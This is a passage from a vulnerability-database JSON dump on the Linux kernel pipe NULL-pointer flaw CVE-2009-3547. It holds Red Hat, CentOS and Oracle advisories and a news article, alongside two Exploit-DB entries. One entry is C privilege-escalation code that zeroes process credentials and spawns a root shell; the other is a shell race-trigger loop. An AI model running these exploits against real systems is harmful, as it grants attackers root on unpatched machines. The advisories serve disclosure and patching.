task[i] = 0;\r\n task[i+1] = 0;\r\n task[i+2] = 0;\r\n task[i+3] = 0;\r\n is_done(1);\r\n return;\r\n }\r\n }\r\n\t\r\n\tfor (i = 0; i<1024; i++)\r\n\t{\r\n\t\ttaskstruct[i] = task[i];\r\n\t\tcred = (uint32_t *)task[i];\r\n\t\tif (cred == (uint32_t *)task[i+1] && cred > (uint32_t *)0xc0000000) {\r\n\t\t\tcred++; /* Get ride of the cred's 'usage' field */\r\n\t \tif (cred[0] == uid && cred[1] == gid\r\n\t\t && cred[2] == uid && cred[3] == gid\r\n\t\t && cred[4] == uid && cred[5] == gid\r\n\t\t && cred[6] == uid && cred[7] == gid)\r\n\t\t {\r\n\t\t\t\t/* Get root */\r\n\t\t \tcred[0] = cred[2] = cred[4] = cred[6] = 0;\r\n\t\t cred[1] = cred[3] = cred[5] = cred[7] = 0;\r\n\t\t\t\tbreak;\r\n\t\t }\r\n\t\t}\r\n\t}\r\n\tis_done(1);\r\n}\r\n\r\nint main(int ac, char **av)\r\n{\r\n\tint fd[2];\r\n\tint pid;\r\n\tchar tapz[4];\r\n\r\n\r\n\tuid = getuid();\r\n\tgid = getgid();\r\n\tsetresuid(uid, uid, uid);\r\n\tsetresgid(gid, gid, gid);\r\n\t\r\n\tmap_struct_at_null();\r\n\t\r\n\t//while (1) \r\n\t{\r\n\t\tpid = fork();\r\n\t\tif (pid == -1)\r\n\t\t{\r\n\t\t\tperror(\"fork\");\r\n\t\t\treturn (-1);\r\n\t\t}\r\n\t\tif (pid)\r\n\t\t{\r\n\t\t\tchar path[1024];\r\n\t\t\t/* I assume next opened fd will be 4 */\r\n\t\t\tsprintf(path, \"/proc/%d/fd/4\", pid);\r\n\t\t\twhile (!is_done(0))\r\n\t\t\t{\r\n\t\t\t\tfd[0] = open(path, O_RDWR);\r\n\t\t\t\tif (fd[0] != -1)\r\n\t\t\t\t{\r\n\t\t\t\t\tif(iz_kern2600_10)\r\n {\r\n memcpy(tapz, (char *)get_cur_task_and_escalate_priv, sizeof(int));\r\n write(fd[0], tapz, 4);\r\n }\r\n\t\t\t\t\tclose(fd[0]);\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\tif(iz_kern2600_10)\r\n {\r\n syscall(__NR_olduname, NULL);\r\n }\r\n printf(\"\\t\\t+ Got root!\\n\");\r\n\t\t\tgomu_gomu_nooooo_gatling_shell();\r\n\t\t\treturn (0);\r\n\t\t}\r\n\t\r\n\t\twhile (!is_done(0))\r\n\t\t{\r\n\t\t\tif (pipe(fd) != -1)\r\n\t\t\t{\r\n\t\t\t\tclose(fd[0]);\r\n\t\t\t\tclose(fd[1]);\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n}\r\n\r\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/33321/"}, {"lastseen": "2016-02-01T11:44:27", "bulletinFamily": "exploit", "description": "Linux Kernel - 'pipe.c' Local Privilege Escalation Vulnerability. CVE-2009-3547. Local exploit for linux platform", "modified": "2009-11-12T00:00:00", "published": "2009-11-12T00:00:00", "id": "EDB-ID:10018", "href": "https://www.exploit-db.com/exploits/10018/", "type": "exploitdb", "title": "Linux Kernel - 'pipe.c' Local Privilege Escalation Vulnerability", "sourceData": "while : ; do\r\n { echo y ; sleep 1 ; } | { while read ; do echo z$REPLY; done ; } &\r\n PID=$!\r\n OUT=$(ps -efl | grep 'sleep 1' | grep -v grep |\r\n { read PID REST ; echo $PID; } )\r\n OUT=\"${OUT%% *}\"\r\n DELAY=$((RANDOM * 1000 / 32768))\r\n usleep $((DELAY * 1000 + RANDOM % 1000 ))\r\n echo n > /proc/$OUT/fd/1 # Trigger defect\r\ndone", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/10018/"}], "oraclelinux": [{"lastseen": "2019-05-29T18:37:42", "bulletinFamily": "unix", "description": "[2.6.9-89.0.16.0.1.EL]\n- fix skb alignment that was causing sendto() to fail with EFAULT\n (Olaf Kirch) [orabug 6845794]\n- fix enomem due to larger mtu size page alloc (Zach Brown) [orabug 5486128]\n- backout patch sysrq-b that queues upto keventd thread (Guru Anbalagane)\n [orabug 6125546]\n- netrx/netpoll race avoidance (Tina Yang) [orabug 6143381]\n- [XEN] Fix elf_core_dump (Tina Yang) [orabug 6995928]\n- use lfence instead of cpuid instruction to implement memory barriers\n (Herbert van den Bergh) [orabug 7452412]\n- add netpoll support to xen netfront (Tina Yang) [orabz 7261]\n- [xen] execshield: fix endless GPF fault loop (Stephen Tweedie)\n [orabug 7175395]\n- [xen]: port el5u2 patch that allows 64-bit PVHVM guest to boot with 32-bit\n dom0 [orabug 7452107] xenstore\n- [mm] update shrink_zone patch to allow 100% swap utilization (John Sobecki,\n Chris Mason, Chuck Anderson, Dave McCracken) [orabug 7566319,6086839]\n- [kernel] backport report_lost_ticks patch from EL5.2 (John Sobecki) [orabug 6110605]\n- [xen] fix for hung JVM thread after #GPF [orabug 7916406] (Chuck Anderson)\n- port EL5U3 patch to adjust totalhigh_pages in the balloon driver [orabug 8300888]\n- check to see if hypervisor supports memory reservation change (Chuck Anderson) [orabug7556514]\n- [XEN] use hypercall to fixmap pte updates (Mukesh Rathor) [orabug 8433329]\n- [XEN] Extend physical mask to 40bit for machine above 64G [orabug 8312526]\n- fix oops in nlmclnt_mark_reclaim (Trond Myklebust) [orabug 8568878]\n- [x86_64] Allowed machine_reboot running on boot_cpu (Joe Jin) [orabug 8425237]\n[2.6.9-89.0.16]\n-fs: fix pipe null pointer dereference (Jeff Moyer) [530936 530937] {CVE-2009-3547} ", "modified": "2009-11-03T00:00:00", "published": "2009-11-03T00:00:00", "id": "ELSA-2009-1541", "href": "http://linux.oracle.com/errata/ELSA-2009-1541.html", "title": "kernel security update", "type": "oraclelinux", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:53", "bulletinFamily": "unix", "description": "[2.6.18-164.6.1.0.1.el5]\n- [xen] check to see if hypervisor supports memory reservation change (Chuck Anderson) [orabug 7556514]\n- Add entropy support to igb ( John Sobecki) [orabug 7607479]\n- [nfs] convert ENETUNREACH to ENOTCONN [orabug 7689332]\n- [NET] Add xen pv/bonding netconsole support (Tina yang) [orabug 6993043] [bz 7258]\n- [MM] shrink zone patch (John Sobecki,Chris Mason) [orabug 6086839]\n- fix aacraid not to reset during kexec (Joe Jin) [orabug 8516042]\n- [nfsd] fix failure of file creation from hpux client (Wen gang Wang) [orabug 7579314]\n[2.6.18-164.6.1.el5]\n- [fs] fix pipe null pointer dereference (Jeff Moyer) [530938 530939] {CVE-2009-3547}\n- [security] require root for mmap_min_addr (Eric Paris ) [518142 518143] {CVE-2009-2695}\n- [net] lvs: adjust sync protocol handling for ipvsadm -2 (Neil Horman ) [528645 524129]\n- [xen] allow booting with broken serial hardware (Chris Lalancette ) [524153 518338]\n[2.6.18-164.5.1.el5]\n- [fs] eCryptfs: prevent lower dentry from going negative (Eric Sandeen ) [527834 527835] {CVE-2009-2908}\n- [nfs] v4: reclaimer thread stuck in an infinite loop (Sachin S. Prabhu ) [529162 526888]\n- [net] r8169: avoid losing MSI interrupts (Ivan Vecera ) [529366 514589]\n- [scsi] st.c: memory use after free after MTSETBLK ioctl (David Jeffery ) [528133 520192]\n- [net] r8169: balance pci_map/unmap pair, use hw padding (Ivan Vecera ) [529143 515857] {CVE-2009-3613}\n[2.6.18-164.4.1.el5]\n- [net] bonding: set primary param via sysfs (Jiri Pirko ) [517971 499884]\n- [scsi] fusion: re-enable mpt_msi_enable option (Tomas Henzl ) [526963 520820]\n- [net] ipt_recent: sanity check hit count (Amerigo Wang ) [527434 523982]\n- [net] ipv4: ip_append_data handle NULL routing table (Jiri Pirko ) [527436 520297]\n- [nfs] fix cache invalidation problems in nfs_readdir (Jeff Layton ) [526960 511170]\n- [net] tc: fix unitialized kernel memory leak (Jiri Pirko ) [520994 520863]\n[2.6.18-164.3.1.el5]\n- [nfs] knfsd: fix NFSv4 O_EXCL creates (Jeff Layton ) [522163 524521] {CVE-2009-3286}", "modified": "2009-11-03T00:00:00", "published": "2009-11-03T00:00:00", "id": "ELSA-2009-1548", "href": "http://linux.oracle.com/errata/ELSA-2009-1548.html", "title": "kernel security and bug fix update", "type": "oraclelinux", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:34:23", "bulletinFamily": "unix", "description": "[2.4.21-63.0.0.0.1.EL]\n- add directio support for qla drivers (herb) [ora 6346849]\n- support PT Quad card [ora 5751043]\n- io to nfs partition hangs [ora 5088963]\n- add entropy for bnx2 nic [ora 5931647]\n- avoid large allocation-fragmentation in MTU (zab)\n- fix clear highpage (wli)\n[2.4.21-63.EL]\n- fs: fix pipe null pointer dereference (Don Howard) [530935] {CVE-2009-3547}\n[2.4.21-61.EL]\n- ipv6: use timer pending to fix bridge reference count problem (Don Howard) [457010]\n- net: fix unix socket panic (Don Howard) [470432] {CVE-2008-5029}\n- unix: fix oom with unix socket garbage collector [473266] {CVE-2008-5300}\n- exit_notify: kill the wrong capable check (Don Howard) [497266] {CVE-2009-1337}\n- e1000: fix skb_over_panic (Don Howard) [503439] {CVE-2009-1385}\n- net: ensure devname passed to SO_BINDTODEVICE is NULL-terminated (Don Howard) [505514]\n- kernel: personality handling: fix per_clear_on_setid (Don Howard) [508845] {CVE-2009-1895}\n- build with fno-delete-null-pointer-checks (Don Howard) [511185]\n- implement mmap_min_addr infrastructure (Don Howard) [512642]\n- execve: must clear current->clear_child_tid (Don Howard) [515426] {CVE-2009-2848}\n- net: Fix info leaks in getname() implementations (Don Howard) [520292] {CVE-2009-3002}\n- net: ipv4: ip_append_data handle NULL routing table (Don Howard) [520300] ", "modified": "2009-11-04T00:00:00", "published": "2009-11-04T00:00:00", "id": "ELSA-2009-1550", "href": "http://linux.oracle.com/errata/ELSA-2009-1550.html", "title": "kernel security and bug fix update", "type": "oraclelinux", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "threatpost": [{"lastseen": "2018-10-06T23:09:19", "bulletinFamily": "info", "description": "Th[](<https://threatpost.com/critical-flaw-found-linux-kernel-110509/>)ere is a [NULL pointer dereference flaw in the Linux kernel](<http://lkml.org/lkml/2009/10/14/184>) that can be exploited by attackers to gain root access to a vulnerable machine.\n\nThe vulnerability is in version 2.6.21 of the Linux kernel and some Linux vendors already have taken steps to fix the vulnerability. Red Hat has released a [fix for the flaw](<https://rhn.redhat.com/cve/CVE-2009-3547.html>) in several versions of its Linux distributions. Red Hat also has released advisories on the issue, explaining the vulnerability and its effect on vulnerable machines.\n\nA NULL pointer dereference flaw was found in each of the following functions in the Linux kernel: pipe_read_open(), pipe_write_open(), and pipe_rdwr_open(). When the mutex lock is not held, the i_pipe pointer could be released by other processes before it is used to update the pipe\u2019s reader and writer counters. This could lead to a local denial of service or privilege escalation.\n\nDebian also has posted instructions for addressing the [flaw in its Linux distributions](<http://wiki.debian.org/mmap_min_addr>), which are vulnerable to this problem by default. NULL pointer dereferences are particularly complex problems that are difficult to exploit in many cases. This particular problem was identified in mid-October and so far, there have not been any public exploits released for the Linux kernel flaw.\n", "modified": "2018-08-15T14:16:20", "published": "2009-11-05T13:45:39", "id": "THREATPOST:9B247D64D74F86C01215CC8DF7D85698", "href": "https://threatpost.com/critical-flaw-found-linux-kernel-110509/73037/", "type": "threatpost", "title": "Critical Flaw Found in Linux Kernel", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2019-08-13T18:45:19", "bulletinFamily": "unix", "description": "The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issues:\n\n* a NULL pointer dereference flaw was found in each of the following\nfunctions in the Linux kernel: pipe_read_open(), pipe_write_open(), and\npipe_rdwr_open(). When the mutex lock is not held, the i_pipe pointer could\nbe released by other processes before it is used to update the pipe's\nreader and writer counters. This could lead to a local denial of service or\nprivilege escalation. (CVE-2009-3547, Important)\n\nUsers should upgrade to these updated packages, which contain a backported\npatch to correct these issues. The system must be rebooted for this update\nto take effect.", "modified": "2017-09-08T12:10:03", "published": "2009-11-03T05:00:00", "id": "RHSA-2009:1541", "href": "https://access.redhat.com/errata/RHSA-2009:1541", "type": "redhat", "title": "(RHSA-2009:1541) Important: kernel security update", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:07", "bulletinFamily": "unix", "description": "The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issues:\n\n* a system with SELinux enforced was more permissive in allowing local\nusers in the unconfined_t domain to map low memory areas even if the\nmmap_min_addr restriction was enabled. This could aid in the local\nexploitation of NULL pointer dereference bugs. (CVE-2009-2695, Important)\n\n* a NULL pointer dereference flaw was found in each of the following\nfunctions in the Linux kernel: pipe_read_open(), pipe_write_open(), and\npipe_rdwr_open(). When the mutex lock is not held, the i_pipe pointer could\nbe released by other processes before it is used to update the pipe's\nreader and writer counters. This could lead to a local denial of service or\nprivilege escalation. (CVE-2009-3547, Important)\n\nThis update also fixes the following bug:\n\n* a bug in the IPv6 implementation in the Linux kernel could have caused an\nunbalanced reference count. When using network bonding, this bug may have\ncaused a hang when shutting the system down via \"shutdown -h\", or prevented\nthe network service from being stopped via \"service network stop\".\n(BZ#538409)\n\nUsers should upgrade to these updated packages, which contain backported\npatches to correct these issues. The system must be rebooted for this\nupdate to take effect.", "modified": "2017-07-28T19:00:16", "published": "2009-12-15T05:00:00", "id": "RHSA-2009:1672", "href": "https://access.redhat.com/errata/RHSA-2009:1672", "type": "redhat", "title": "(RHSA-2009:1672) Important: kernel security and bug fix update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:44:51", "bulletinFamily": "unix", "description": "The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issues:\n\n* a system with SELinux enforced was more permissive in allowing local\nusers in the unconfined_t domain to map low memory areas even if the\nmmap_min_addr restriction was enabled. This could aid in the local\nexploitation of NULL pointer dereference bugs. (CVE-2009-2695, Important)\n\n* a NULL pointer dereference flaw was found in each of the following\nfunctions in the Linux kernel: pipe_read_open(), pipe_write_open(), and\npipe_rdwr_open(). When the mutex lock is not held, the i_pipe pointer could\nbe released by other processes before it is used to update the pipe's\nreader and writer counters. This could lead to a local denial of service or\nprivilege escalation. (CVE-2009-3547, Important)\n\nThis update also fixes the following bugs:\n\n* a caching bug in nfs_readdir() has been resolved. This may have caused\nparts of directory listings to become stale, as they came from cached data\nwhen they should not have, possibly causing NFS clients to see duplicate\nfiles or not see all files in a directory. (BZ#526959)\n\n* a bug prevented the pciehp driver from detecting PCI Express hot plug\nslots on some systems. (BZ#530381)\n\n* when a process attempted to read from a page that had first been accessed\nby writing to part of it (via write(2)), the NFS client needed to flush the\nmodified portion of the page out to the server, and then read the entire\npage back in. This flush caused performance issues. (BZ#521243)\n\n* a deadlock was found in the cciss driver. In rare cases, this caused an\nNMI lockup during boot. Messages such as \"cciss: controller cciss[x]\nfailed, stopping.\" and \"cciss[x]: controller not responding.\" may have been\ndisplayed on the console. (BZ#525728)\n\nUsers should upgrade to these updated packages, which contain backported\npatches to correct these issues. The system must be rebooted for this\nupdate to take effect.", "modified": "2017-07-28T19:03:36", "published": "2009-11-17T05:00:00", "id": "RHSA-2009:1587", "href": "https://access.redhat.com/errata/RHSA-2009:1587", "type": "redhat", "title": "(RHSA-2009:1587) Important: kernel security and bug fix update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:45:26", "bulletinFamily": "unix", "description": "The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nSecurity fixes:\n\n* a system with SELinux enforced was more permissive in allowing local\nusers in the unconfined_t domain to map low memory areas even if the\nmmap_min_addr restriction was enabled. This could aid in the local\nexploitation of NULL pointer dereference bugs. (CVE-2009-2695, Important)\n\n* a NULL pointer dereference flaw was found in the eCryptfs implementation\nin the Linux kernel. A local attacker could use this flaw to cause a local\ndenial of service or escalate their privileges. (CVE-2009-2908, Important)\n\n* a flaw was found in the NFSv4 implementation. The kernel would do an\nunnecessary permission check after creating a file. This check would\nusually fail and leave the file with the permission bits set to random\nvalues. Note: This is a server-side only issue. (CVE-2009-3286, Important)\n\n* a NULL pointer dereference flaw was found in each of the following\nfunctions in the Linux kernel: pipe_read_open(), pipe_write_open(), and\npipe_rdwr_open(). When the mutex lock is not held, the i_pipe pointer could\nbe released by other processes before it is used to update the pipe's\nreader and writer counters. This could lead to a local denial of service or\nprivilege escalation. (CVE-2009-3547, Important)\n\n* a flaw was found in the Realtek r8169 Ethernet driver in the Linux\nkernel. pci_unmap_single() presented a memory leak that could lead to IOMMU\nspace exhaustion and a system crash. An attacker on the local network could\nabuse this flaw by using jumbo frames for large amounts of network traffic.\n(CVE-2009-3613, Important)\n\n* missing initialization flaws were found in the Linux kernel. Padding data\nin several core network structures was not initialized properly before\nbeing sent to user-space. These flaws could lead to information leaks.\n(CVE-2009-3228, Moderate)\n\nBug fixes:\n\n* with network bonding in the \"balance-tlb\" or \"balance-alb\" mode, the\nprimary setting for the primary slave device was lost when said device was\nbrought down. Bringing the slave back up did not restore the primary\nsetting. (BZ#517971)\n\n* some faulty serial device hardware caused systems running the kernel-xen\nkernel to take a very long time to boot. (BZ#524153)\n\n* a caching bug in nfs_readdir() may have caused NFS clients to see\nduplicate files or not see all files in a directory. (BZ#526960)\n\n* the RHSA-2009:1243 update removed the mpt_msi_enable option, preventing\ncertain scripts from running. This update adds the option back. (BZ#526963)\n\n* an iptables rule with the recent module and a hit count value greater\nthan the ip_pkt_list_tot parameter (the default is 20), did not have any\neffect over packets, as the hit count could not be reached. (BZ#527434)\n\n* a check has been added to the IPv4 code to make sure that rt is not NULL,\nto help prevent future bugs in functions that call ip_append_data() from\nbeing exploitable. (BZ#527436)\n\n* a kernel panic occurred in certain conditions after reconfiguring a tape\ndrive's block size. (BZ#528133)\n\n* when using the Linux Virtual Server (LVS) in a master and backup\nconfiguration, and propagating active connections on the master to the\nbackup, the connection timeout value on the backup was hard-coded to 180\nseconds, meaning connection information on the backup was soon lost. This\ncould prevent the successful failover of connections. The timeout value\ncan now be set via \"ipvsadm --set\". (BZ#528645)\n\n* a bug in nfs4_do_open_expired() could have caused the reclaimer thread on\nan NFSv4 client to enter an infinite loop. (BZ#529162)\n\n* MSI interrupts may not have been delivered for r8169 based network cards\nthat have MSI interrupts enabled. This bug only affected certain systems.\n(BZ#529366)\n\nUsers should upgrade to these updated packages, which contain backported\npatches to correct these issues. The system must be rebooted for this\nupdate to take effect.", "modified": "2017-09-08T12:07:24", "published": "2009-11-03T05:00:00", "id": "RHSA-2009:1548", "href": "https://access.redhat.com/errata/RHSA-2009:1548", "type": "redhat", "title": "(RHSA-2009:1548) Important: kernel security and bug fix update", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-08-13T18:45:38", "bulletinFamily": "unix", "description": "The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nSecurity fixes:\n\n* when fput() was called to close a socket, the __scm_destroy() function in\nthe Linux kernel could make indirect recursive calls to itself. This could,\npotentially, lead to a denial of service issue. (CVE-2008-5029, Important)\n\n* the sendmsg() function in the Linux kernel did not block during UNIX\nsocket garbage collection. This could, potentially, lead to a local denial\nof service. (CVE-2008-5300, Important)\n\n* the exit_notify() function in the Linux kernel did not properly reset the\nexit signal if a process executed a set user ID (setuid) application before\nexiting. This could allow a local, unprivileged user to elevate their\nprivileges. (CVE-2009-1337, Important)\n\n* a flaw was found in the Intel PRO/1000 network driver in the Linux\nkernel. Frames with sizes near the MTU of an interface may be split across\nmultiple hardware receive descriptors. Receipt of such a frame could leak\nthrough a validation check, leading to a corruption of the length check. A\nremote attacker could use this flaw to send a specially-crafted packet that\nwould cause a denial of service or code execution. (CVE-2009-1385,\nImportant)\n\n* the ADDR_COMPAT_LAYOUT and MMAP_PAGE_ZERO flags were not cleared when a\nsetuid or setgid program was executed. A local, unprivileged user could use\nthis flaw to bypass the mmap_min_addr protection mechanism and perform a\nNULL pointer dereference attack, or bypass the Address Space Layout\nRandomization (ASLR) security feature. (CVE-2009-1895, Important)\n\n* it was discovered that, when executing a new process, the clear_child_tid\npointer in the Linux kernel is not cleared. If this pointer points to a\nwritable portion of the memory of the new program, the kernel could corrupt\nfour bytes of memory, possibly leading to a local denial of service or\nprivilege escalation. (CVE-2009-2848, Important)\n\n* missing initialization flaws were found in getname() implementations in\nthe IrDA sockets, AppleTalk DDP protocol, NET/ROM protocol, and ROSE\nprotocol implementations in the Linux kernel. Certain data structures in\nthese getname() implementations were not initialized properly before being\ncopied to user-space. These flaws could lead to an information leak.\n(CVE-2009-3002, Important)\n\n* a NULL pointer dereference flaw was found in each of the following\nfunctions in the Linux kernel: pipe_read_open(), pipe_write_open(), and\npipe_rdwr_open(). When the mutex lock is not held, the i_pipe pointer could\nbe released by other processes before it is used to update the pipe's\nreader and writer counters. This could lead to a local denial of service or\nprivilege escalation. (CVE-2009-3547, Important)\n\nBug fixes:\n\n* this update adds the mmap_min_addr tunable and restriction checks to help\nprevent unprivileged users from creating new memory mappings below the\nminimum address. This can help prevent the exploitation of NULL pointer\ndereference bugs. Note that mmap_min_addr is set to zero (disabled) by\ndefault for backwards compatibility. (BZ#512642)\n\n* a bridge reference count problem in IPv6 has been fixed. (BZ#457010)\n\n* enforce null-termination of user-supplied arguments to setsockopt().\n(BZ#505514)\n\n* the gcc flag \"-fno-delete-null-pointer-checks\" was added to the kernel\nbuild options. This prevents gcc from optimizing out NULL pointer checks\nafter the first use of a pointer. NULL pointer bugs are often exploited by\nattackers. Keeping these checks is a safety measure. (BZ#511185)\n\n* a check has been added to the IPv4 code to make sure that rt is not NULL,\nto help prevent future bugs in functions that call ip_append_data() from\nbeing exploitable. (BZ#520300)\n\nUsers should upgrade to these updated packages, which contain backported\npatches to correct these issues. The system must be rebooted for this\nupdate to take effect.", "modified": "2018-05-26T04:26:18", "published": "2009-11-03T05:00:00", "id": "RHSA-2009:1550", "href": "https://access.redhat.com/errata/RHSA-2009:1550", "type": "redhat", "title": "(RHSA-2009:1550) Important: kernel security and bug fix update", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-08-13T18:44:49", "bulletinFamily": "unix", "description": "The kernel-rt packages contain the Linux kernel, the core of any Linux\noperating system.\n\nSecurity fixes:\n\n* the ADDR_COMPAT_LAYOUT and MMAP_PAGE_ZERO flags were not cleared when a\nsetuid or setgid program was executed. A local, unprivileged user could use\nthis flaw to bypass the mmap_min_addr protection mechanism and perform a\nNULL pointer dereference attack, or bypass the Address Space Layout\nRandomization (ASLR) security feature. (CVE-2009-1895, Important)\n\n* a system with SELinux enforced was more permissive in allowing local\nusers in the unconfined_t domain to map low memory areas even if the\nmmap_min_addr restriction was enabled. This could aid in the local\nexploitation of NULL pointer dereference bugs. (CVE-2009-2695, Important)\n\n* missing initialization flaws were found in getname() implementations in\nnumerous network protocol implementations in the Linux kernel. Certain\ndata structures in these getname() implementations were not initialized\nproperly before being copied to user-space. These flaws could lead to an\ninformation leak. (CVE-2009-3002, Important)\n\n* a NULL pointer dereference flaw was found in each of the following\nfunctions in the Linux kernel: pipe_read_open(), pipe_write_open(), and\npipe_rdwr_open(). When the mutex lock is not held, the i_pipe pointer could\nbe released by other processes before it is used to update the pipe's\nreader and writer counters. This could lead to a local denial of service or\nprivilege escalation. (CVE-2009-3547, Important)\n\n* a flaw was found in the Realtek r8169 Ethernet driver in the Linux\nkernel. pci_unmap_single() presented a memory leak that could lead to IOMMU\nspace exhaustion and a system crash. An attacker on the local network could\nabuse this flaw by using jumbo frames for large amounts of network traffic.\n(CVE-2009-3613, Important)\n\n* NULL pointer dereference flaws were found in the r128 driver in the\nLinux kernel. Checks to test if the Concurrent Command Engine state was\ninitialized were missing in private IOCTL functions. An attacker could use\nthese flaws to cause a local denial of service or escalate their\nprivileges. (CVE-2009-3620, Important)\n\n* Kees Cook and Steve Beattie discovered a race condition in the /proc\ncode in the Linux kernel. This could lead to information in the\n\"/proc/[pid]/maps\" and \"/proc/[pid]/smaps\" files being leaked to users (who\nwould otherwise not have access to this information) during ELF loading.\nThis could help a local attacker bypass the ASLR security feature.\n(CVE-2009-2691, Moderate)\n\n* a NULL pointer dereference flaw was found in the md driver in the Linux\nkernel. If the suspend_lo or suspend_hi file in \"/sys/\" is modified when\nthe disk array is inactive, it could lead to a local denial of service or\nprivilege escalation. By default, only root can write to these two files.\n(CVE-2009-2849, Moderate)\n\n* an information leak was found in the Linux kernel. On AMD64 systems,\n32-bit processes could access and read certain 64-bit registers by\ntemporarily switching themselves to 64-bit mode. (CVE-2009-2910, Moderate)\n\n* padding data in several core network structures was not initialized\nproperly before being sent to user-space, possibly leading to information\nleaks. (CVE-2009-3228, CVE-2009-3612, Moderate)\n\n* the unix_stream_connect() function in the Linux kernel did not check if a\nUNIX domain socket was in the shutdown state. This could lead to a\ndeadlock. A local, unprivileged user could use this flaw to cause a denial\nof service. (CVE-2009-3621, Moderate)\n\nThese updated packages also include bug fixes and enhancements. Users are\ndirected to the Realtime Security Update Release Notes for version 1.1 for\ninformation on these changes, which will be available shortly from: \n\nhttp://www.redhat.com/docs/en-US/Red_Hat_Enterprise_MRG/\n\nUsers should upgrade to these updated packages, which contain backported\npatches to correct these issues and add enhancements. The system must be\nrebooted for this update to take effect.", "modified": "2019-03-22T23:44:22", "published": "2009-11-03T05:00:00", "id": "RHSA-2009:1540", "href": "https://access.redhat.com/errata/RHSA-2009:1540", "type": "redhat", "title": "(RHSA-2009:1540) Important: kernel-rt security, bug fix, and enhancement update", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "centos": [{"lastseen": "2019-05-29T18:33:42", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2009:1541\n\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issues:\n\n* a NULL pointer dereference flaw was found in each of the following\nfunctions in the Linux kernel: pipe_read_open(), pipe_write_open(), and\npipe_rdwr_open(). When the mutex lock is not held, the i_pipe pointer could\nbe released by other processes before it is used to update the pipe's\nreader and writer counters. This could lead to a local denial of service or\nprivilege escalation. (CVE-2009-3547, Important)\n\nUsers should upgrade to these updated packages, which contain a backported\npatch to correct these issues. The system must be rebooted for this update\nto take effect.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2009-November/016302.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-November/016303.html\n\n**Affected packages:**\nkernel\nkernel-devel\nkernel-doc\nkernel-hugemem\nkernel-hugemem-devel\nkernel-largesmp\nkernel-largesmp-devel\nkernel-smp\nkernel-smp-devel\nkernel-xenU\nkernel-xenU-devel\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2009-1541.html", "modified": "2009-11-04T16:45:18", "published": "2009-11-04T16:45:03", "href": "http://lists.centos.org/pipermail/centos-announce/2009-November/016302.html", "id": "CESA-2009:1541", "title": "kernel security update", "type": "centos", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:18", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2009:1548\n\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nSecurity fixes:\n\n* a system with SELinux enforced was more permissive in allowing local\nusers in the unconfined_t domain to map low memory areas even if the\nmmap_min_addr restriction was enabled. This could aid in the local\nexploitation of NULL pointer dereference bugs. (CVE-2009-2695, Important)\n\n* a NULL pointer dereference flaw was found in the eCryptfs implementation\nin the Linux kernel. A local attacker could use this flaw to cause a local\ndenial of service or escalate their privileges. (CVE-2009-2908, Important)\n\n* a flaw was found in the NFSv4 implementation. The kernel would do an\nunnecessary permission check after creating a file. This check would\nusually fail and leave the file with the permission bits set to random\nvalues. Note: This is a server-side only issue. (CVE-2009-3286, Important)\n\n* a NULL pointer dereference flaw was found in each of the following\nfunctions in the Linux kernel: pipe_read_open(), pipe_write_open(), and\npipe_rdwr_open(). When the mutex lock is not held, the i_pipe pointer could\nbe released by other processes before it is used to update the pipe's\nreader and writer counters. This could lead to a local denial of service or\nprivilege escalation. (CVE-2009-3547, Important)\n\n* a flaw was found in the Realtek r8169 Ethernet driver in the Linux\nkernel. pci_unmap_single() presented a memory leak that could lead to IOMMU\nspace exhaustion and a system crash. An attacker on the local network could\nabuse this flaw by using jumbo frames for large amounts of network traffic.\n(CVE-2009-3613, Important)\n\n* missing initialization flaws were found in the Linux kernel. Padding data\nin several core network structures was not initialized properly before\nbeing sent to user-space. These flaws could lead to information leaks.\n(CVE-2009-3228, Moderate)\n\nBug fixes:\n\n* with network bonding in the \"balance-tlb\" or \"balance-alb\" mode, the\nprimary setting for the primary slave device was lost when said device was\nbrought down. Bringing the slave back up did not restore the primary\nsetting. (BZ#517971)\n\n* some faulty serial device hardware caused systems running the kernel-xen\nkernel to take a very long time to 